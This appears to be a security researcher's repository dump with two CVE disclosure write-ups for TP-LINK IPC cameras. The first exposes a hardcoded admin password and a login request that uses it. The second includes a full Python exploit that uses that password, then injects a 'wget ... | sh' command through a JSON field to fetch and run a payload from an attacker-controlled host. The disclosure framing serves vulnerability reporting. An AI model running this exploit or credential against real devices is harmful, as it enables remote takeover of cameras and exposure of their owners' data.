├── README.md ├── TP-LINK-login-Escalation-of-Privileges └── TP-LINK-websys-Authenticated-RCE /README.md: -------------------------------------------------------------------------------- 1 | # IOT-pwn-for-fun 2 | -------------------------------------------------------------------------------- /TP-LINK-login-Escalation-of-Privileges: -------------------------------------------------------------------------------- 1 | [Suggested description] 2 | /usr/lib/lua/luci/websys.lua on TP-LINK IPC TL-IPC223(P)-6, 3 | TL-IPC323K-D, TL-IPC325(KP)-*, and TL-IPC40A-4 devices has a hardcoded factory 4 | zMiVw8Kw0oxKXL0 password. Nearly all such devices exposed on the Internet (more than 10000) can be directly 5 | logged into with it, which leads to escalation of privileges and information disclosure. 6 | 7 | ------------------------------------------ 8 | 9 | [Additional Information] 10 | Hard Coded Password in TP-LINK IPC Camera leading to Escalation of Privileges and Information Disclosure 11 | 12 | ------------------------------------------ 13 | 14 | [Vulnerability Type] 15 | Incorrect Access Control 16 | 17 | ------------------------------------------ 18 | 19 | [Vendor of Product] 20 | TP-LINK 21 | 22 | ------------------------------------------ 23 | 24 | [Affected Product Code Base] 25 | TP-LINK IPC Camera - TL-IPC325(KP)-* 26 | TP-LINK IPC Camera - TL-IPC323K-D * 27 | TP-link IPC Camera - TL-IPC40A-4 * 28 | TP-LINK IPC Camera - TL-IPC223(P)-6 * 29 | 30 | ------------------------------------------ 31 | 32 | [Affected Component] 33 | /usr/lib/lua/luci/websys.lua: 34 | DEFAULT_PWD = "zMiVw8Kw0oxKXL0" 35 | ... 36 | skip 37 | ... 38 | if not e then 39 | return true 40 | end 41 | if e == DEFAULT_PWD then 42 | return true 43 | ... 
44 | 45 | ------------------------------------------ 46 | 47 | [Attack Type] 48 | Remote 49 | 50 | ------------------------------------------ 51 | 52 | [Impact Escalation of Privileges] 53 | true 54 | 55 | ------------------------------------------ 56 | 57 | [Impact Information Disclosure] 58 | true 59 | 60 | ------------------------------------------ 61 | 62 | [Attack Vectors] 63 | headers = {"Content-Type":"application/json; charset=UTF-8"} 64 | 65 | r = requests.post("http://%s/"%ip, '{"method":"do","login":{"username":"admin","password":"zMiVw8Kw0oxKXL0"}}', headers = headers) 66 | 67 | ret = json.loads(r.text) 68 | 69 | ------------------------------------------ 70 | 71 | [Reference] 72 | http://service.tp-link.com.cn/detail_download_5471.html(official firmware) 73 | https://www.tp-link.com/us/security 74 | 75 | ------------------------------------------ 76 | 77 | [Discoverer] 78 | dbappsecurity 79 | 80 | [Timeline] 81 | 2018-02-01 Find Vuln. 82 | 2018-02-02 Try to contact TP-Link China ... 83 | 2018-05-24 Failed To contact TP-Link China. 84 | 2018-05-25 Submit to CVE mitre. 85 | 2018-05-26 Got CVE-2018-11482. 86 | 2018-05-28 Make public. -------------------------------------------------------------------------------- /TP-LINK-websys-Authenticated-RCE: -------------------------------------------------------------------------------- 1 | [Suggested description] 2 | TP-LINK IPC TL-IPC223(P)-6, TL-IPC323K-D, TL-IPC325(KP)-*, and 3 | TL-IPC40A-4 devices allow authenticated remote code execution via 4 | crafted JSON data because /usr/lib/lua/luci/torchlight/validator.lua 5 | does not block various punctuation characters. 
6 | 7 | ------------------------------------------ 8 | 9 | [VulnerabilityType Other] 10 | RCE 11 | 12 | ------------------------------------------ 13 | 14 | [Vendor of Product] 15 | tp-link 16 | 17 | ------------------------------------------ 18 | 19 | [Affected Product Code Base] 20 | TP-link IPC Camera - TL-IPC325(KP)-* 21 | TP-link IPC Camera - TL-IPC323K-D * 22 | TP-link IPC Camera - TL-IPC40A-4 * 23 | TP-link IPC Camera - TL-IPC223(P)-6 * 24 | 25 | ------------------------------------------ 26 | 27 | [Affected Component] 28 | /usr/lib/lua/luci/torchlight/validator.lua: 29 | .... 30 | local e = "^[%a%d%p]+@[%w%d%-]+%." 31 | if not n:match(e)then 32 | .... 33 | 34 | %p is not strict enough, allows ',",},{, to RCE 35 | 36 | ------------------------------------------ 37 | 38 | [Attack Type] 39 | Remote 40 | 41 | ------------------------------------------ 42 | 43 | [Impact Code execution] 44 | true 45 | 46 | ------------------------------------------ 47 | 48 | [Attack Vectors] 49 | #!/usr/bin/env python 50 | # encoding: utf-8 51 | 52 | import sys 53 | import json 54 | import requests 55 | 56 | if len(sys.argv) != 3: 57 | print "python z.py [TargetIp] [ReverseIP]" 58 | exit(1) 59 | ip = sys.argv[1] 60 | reverse_ip = sys.argv[2] 61 | headers = {"Content-Type":"application/json; charset=UTF-8"} 62 | r = requests.post("http://%s/"%ip, '{"method":"do","login":{"username":"admin","password":"WaQ7x6b09TefbwK", "WHQVQbhc9TefbwK":""}}', headers = headers) 63 | ret = json.loads(r.text) 64 | stok = ret['stok'] 65 | url = "http://%s/stok=%s/ds"%(ip, stok) 66 | data = """{"cloud_config":{"bind":{"username":"testtest@qq.com","password":"'};wget$IFS-qO-$IFS'http://%s/z'|sh;{'"}},"method":"do"}""" %reverse_ip 67 | 68 | r = requests.post(url, data, headers = headers).text 69 | if "0" in r: 70 | print "Success." 71 | elif "-51219" in r: 72 | print "You need reboot target device." 73 | elif "-40401" in r: 74 | print "Bypass Auth Failed" 75 | else: 76 | print "Emmm." 
77 | 78 | ------------------------------------------ 79 | 80 | [Reference] 81 | http://security.tp-link.com.cn/ 82 | http://service.tp-link.com.cn/detail_download_5471.html(official firmware) 83 | https://www.tp-link.com/us/security 84 | 85 | ------------------------------------------ 86 | 87 | [Discoverer] 88 | dbappsecurity 89 | 90 | [Timeline] 91 | 2018-02-01 Find Vuln. 92 | 2018-02-02 Try to contact TP-Link China ... 93 | 2018-05-24 Failed To contact TP-Link China. 94 | 2018-05-25 Submit to CVE mitre. 95 | 2018-05-26 Got CVE-2018-11481. 96 | 2018-05-28 Make public. 97 | 98 | 99 | --------------------------------------------------------------------------------